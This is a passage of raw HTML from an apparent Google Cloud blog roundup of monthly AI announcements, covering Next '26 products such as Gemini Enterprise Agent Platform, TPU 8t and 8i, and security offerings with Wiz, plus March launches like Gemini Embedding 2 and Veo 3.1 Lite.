&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief strategy officer, Wiz. While threat actors have seen gains from the adversarial misuse of AI, Google and Wiz are tackling these challenges head-on by combining Wiz's deep cloud telemetry with Google's world-class AI and quantum research to help CISOs and their organizations meet the needs of the agentic enterprise era. Read more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;News you can use: &lt;/strong&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;What Google I/O '26 means for developing agents on Google Cloud: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We dig into how Gemini Enterprise Agent Platform and the new developer tools shared at I/O fit together, unpack the spectrum of choices for building, and share what we’d actually try first. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/io26-news-for-agent-developers-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Five must-have guides to move agents into production with Gemini Enterprise Agent Platform:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Here is a look back at our five-part series covering the architecture patterns and best practices you need to move your agents into production. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/five-guides-to-building-and-scaling-production-ready-ai-agents?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;How to build an AI-ready security program for the public sector:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; From industrial control systems to decades-old municipal databases, here’s our CISO guidance to prep AI-ready security programs for the public sector. Learn more &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-to-build-an-ai-ready-security-program-for-the-public-sector"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;April&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We hosted &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/welcome-to-google-cloud-next25?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Next&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in Las Vegas on April 22, announcing incredible innovations from Gemini Enterprise Agent Platform to our eighth-generation TPUs. We also expanded the Gemini Enterprise app in collaborative ways: with new features like Projects, you can now work side-by-side with your agents and colleagues. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you missed the livestream, take a look at our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/google-cloud-next/next26-day-1-recap"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Day 1 recap&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. It’s been incredible to see how customers have been applying AI in thousands of ways — so far, we’ve counted &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/101-real-world-generative-ai-use-cases-from-industry-leaders?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;more than 1,300 examples&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top announcements&lt;/span&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Gemini Enterprise Agent Platform: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Our new, comprehensive platform to build, scale, govern, and optimize agents. Moving forward, all Vertex AI services and roadmap evolutions will be delivered exclusively through the Agent Platform, rather than as a standalone service, to power the next generation of agent development. &lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The platform is designed around four core pillars — &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;build, scale, govern, and optimize&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; —&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;that allow teams to collaborate seamlessly. Learn more about Agent Platform &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
    &lt;figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3"&gt;
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_0_gemini_enterprise_agent_platform.max-1000x1000.jpg"
          alt="1 gemini enterprise agent platform"&gt;
    &lt;/figure&gt;
      &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Gemini Enterprise&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;app&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; has all the key components to let teams discover, create, share, and run AI agents in a single environment. At Next ’26, we introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/whats-new-in-gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;several new capabilities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in the Gemini Enterprise app:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Designer &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses the same no-code agent designer experience as Agent Platform and lets employees build sophisticated schedule- and trigger-based agents using any enterprise connector. It gives you a virtual flowchart of your agent, allowing you to inspect, test, and approve workflows, ensuring total transparency for executing critical business processes. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Long-running agents &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;are&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;designed to execute complex business processes. They can work autonomously in secure cloud sandboxes, giving agents the ability to orchestrate business logic, write code to build custom tools, and complete multi-step work like reconciliation activities or sales prospect sequencing — without needing constant prompting. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Inbox in Gemini Enterprise &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;provides a central location to monitor, guide, and help manage all of your agent activity, including your long-running agents. Notifications are intuitively categorized into actionable groups like "Needs your input," "Errors," and "Completed." &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Projects &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;create a dedicated space where the agent’s memory is confined to the files and conversations your team adds. By connecting it to data sources including Google Drive, NotebookLM, and Google Group Chats, the agent becomes an expert on a specific topic and can provide team members daily briefings or status updates without digging through months of documents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Skills &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;create simple shortcuts using an “@” mention for repetitive tasks such as applying brand guidelines, formatting a report, and accessing specific data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Canvas &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;gives our customers an interactive editor &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;directly within Gemini Enterprise. It allows teams to easily create and edit Docs and Slides, and even export to Microsoft 365 files, within the same experience. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Gallery &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;provides access to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/partner-built-agents-available-in-gemini-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;third-party agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;from partners like Adobe, Atlassian, Lovable, and ServiceNow, and is adding more third-party connectors for Asana, Mailchimp, Workday, and more. These integrations enable your agents to retrieve data and execute tasks with your systems-of-record. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;3. AI Hypercomputer: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Designed specifically for demanding AI workloads, our AI Hypercomputer is an advanced, purpose-built architecture that unites performance-optimized hardware for compute, storage, networking, open software and machine learning frameworks — as well as flexible consumption models — into a single, integrated system. We are &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/ai-infrastructure-at-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;announcing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; innovations at every layer of the AI Hypercomputer:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8t, optimized for training, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses breakthrough Inter-Chip Interconnect (ICI) technology to scale up to 9,600 TPUs and 2 PB of shared, high-bandwidth memory in a single superpod. It achieves 3x the processing power of Ironwood and delivers up to 2x more performance/Watt. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;TPU 8i, optimized for inference, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;uses our new Boardfly topology to directly connect 1,152 TPUs in a single pod. It features 3x more on-chip SRAM compared to previous versions to host larger KV caches entirely on-silicon and integrates a specialized Collectives Acceleration Engine. Taken together, TPU 8i delivers 80% better performance per dollar for inference than the prior generation, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;enabling millions of concurrent agents to run cost-effectively&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. The Agentic Data Cloud: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;A new data architecture built for the speed and scale of agentic AI. The Agentic Data Cloud delivers an AI-native architecture, allowing agents to perceive, reason, and act on your behalf in real-time, including: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cross-Cloud Lakehouse, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;standardized on Apache Iceberg, lets you leave your data in AWS or Azure (coming later this year) while querying it instantly, without the friction of vendor lock-in or the cost of data movement.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Knowledge Catalog &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;constructs a unified, dynamic context graph of your entire business, enabling you to ground agents in all of your business data and semantics. With Smart Storage and the Object Context API, files in Google Cloud Storage are instantly tagged and enriched with metadata before an agent touches them. Then our Knowledge Engine uses Gemini to autonomously tag, define logic, and instantly map complex relationships across your entire enterprise, providing the semantic definition your agents have been missing. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Protecting the agentic enterprise: Security built for the AI era.&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Our full-stack AI approach, from the chips to the models, gives you a competitive advantage with better integration and velocity to help protect customers. Not only can Google act on insights from the world’s largest threat observatory and Mandiant frontline experts, but we also bring cutting-edge insights and breakthroughs from Google DeepMind to help make your platforms more secure.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic defense&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Three new agents in Google Security Operations can help &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;hunt threats&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;engineer detections&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;provide context on third parties&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. You can build your own security agents with &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;remote Google Cloud model context protocol (MCP) server support&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for Google Security Operations, now generally available. You can also access the MCP server client directly from the Google Security Operations &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;chat interface&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, available in preview.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Protecting AI and cloud apps across any infrastructure with Wiz&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Newly expanded AI coverage helps build secure agents across clouds and AI studios. New AI-Bill of Materials in development tools can help secure AI-generated code and mitigate the &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/these-4-ai-governance-tips-help-counter-shadow-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;risk of shadow AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;a href="https://wiz.io/blog/wiz-at-google-cloud-next" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Securing agents and the agentic web&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Model Armor can integrate with Agent Gateway, and new Agent Identities provide more layers of defense against shadow AI. &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-google-cloud-fraud-defense-the-next-evolution-of-recaptcha"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Fraud Defense&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the next evolution of reCAPTCHA, offers agent-specific capabilities that can help secure the agentic web as well as the entire user and customer journey.   &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Trusted Cloud&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: We’re simplifying permissions with modern IAM, and advancing Google Cloud security with new capabilities in Security Command Center plus new innovations in data and network security.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;New partner-supported workflows for Google Security Operations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: This new robust cohort of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/next26-announcing-new-partner-supported-workflows-for-google-security-operations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;partner integrations&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; includes partners developing their own agentic security operations centers (SOCs).&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can catch up on all our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/next26-redefining-security-for-the-ai-era-with-google-cloud-and-wiz"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;security announcements from Next ’26 here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you can use &lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-1-flash-tts-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Guide to prompting Gemini 3.1 Flash TTS (text-to-speech)&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The new TTS model introduces a high level of controllability by allowing you to steer the delivery using more than 200 audio tags. We'll share how to get strong results from the model, whether you are building accessible gaming soundtracks, banking systems, or audiobooks. Learn more about the model &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-tts/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-lyria-3-pro?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Ultimate prompting guide for Lyria 3 models&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://deepmind.google/models/lyria/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lyria 3&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Google's family of music-generation models, is designed to give you granular control over vocals, instrumentation, and arrangement. We spent weeks testing the models against every musical genre and use case we could imagine, then put together this guide to share exactly what we learned and how you can get the best results.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/build-a-robust-and-cost-effective-gen-ai-strategy?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;How to find the sweet spot between cost and performance&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: This guide will walk you through Google Cloud's flexible gen AI infrastructure options, showing you how to find that sweet spot on the efficient frontier between cost and performance. We'll start with the foundational pay-as-you-go (PayGo) models and then explore how to layer on more specialized options to build a robust and cost-effective gen AI strategy.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/essential-ai-and-cloud-security-now-on-by-default"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Essential AI and cloud security now on by default&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: To support the next generation of AI innovators, essential AI security and cloud security are now on by default in Security Command Center Standard. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/securing-ai-inference-on-gke-with-model-armor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Securing AI inference on GKE with Model Armor&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Here’s how to secure AI inference on Google Kubernetes Engine with Model Armor and high-performance storage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-rsac-26-ai-security-and-workforce-of-the-future"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Cloud CISO Perspectives: AI, security, and the workforce of the future&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: You can’t bring traditional security to an AI fight, so how do we defend against AI-powered attacks, boost defenders with AI, and secure AI use? Drop in on this RSA Conference fireside chat between Francis deSouza, Google Cloud COO and President, Security Products, and Nick Godfrey, senior director, Office of the CISO.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;March&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;March was a busy month for our AI teams. We launched Gemini Embedding 2, rolled out a highly cost-effective Veo 3.1 Lite model, and officially welcomed the Wiz team to Google Cloud to help redefine security in the AI era. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alongside these launches, we created comprehensive guides to help you get the most out of these models, from prompting formulas for Nano Banana 2, to practical advice for optimizing your TPU training. Here’s a quick look at the latest news and resources to help your team build what’s next.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits: &lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-embedding-2/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Embedding 2: Our first natively multimodal embedding model:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Embedding 2 is our first natively multimodal embedding model that maps text, images, video, audio and documents into a single embedding space, enabling multimodal retrieval and classification across different types of media — and it’s available now in public preview.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-lite/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Build with Veo 3.1 Lite, our most cost-effective video generation model&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This model empowers developers to build high-volume video applications, at less than 50% of the cost of Veo 3.1 Fast, but with the same speed. This rounds out the Veo 3.1 model family, giving developers flexibility based on needs. For Cloud customers, it’s now &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/veo-3-1-lite-and-a-new-veo-upscaling-capability-on-vertex-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;available on Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s a fun bonus: Check out our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-veo-3-1?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ultimate prompting guide for Veo 3.1&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to get started.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=1BySW9YaSME"
      data-glue-modal-trigger="uni-modal-1BySW9YaSME-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_AyzQwc0.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Veo 3.1 Lite&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-1BySW9YaSME-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="1BySW9YaSME"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=1BySW9YaSME"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
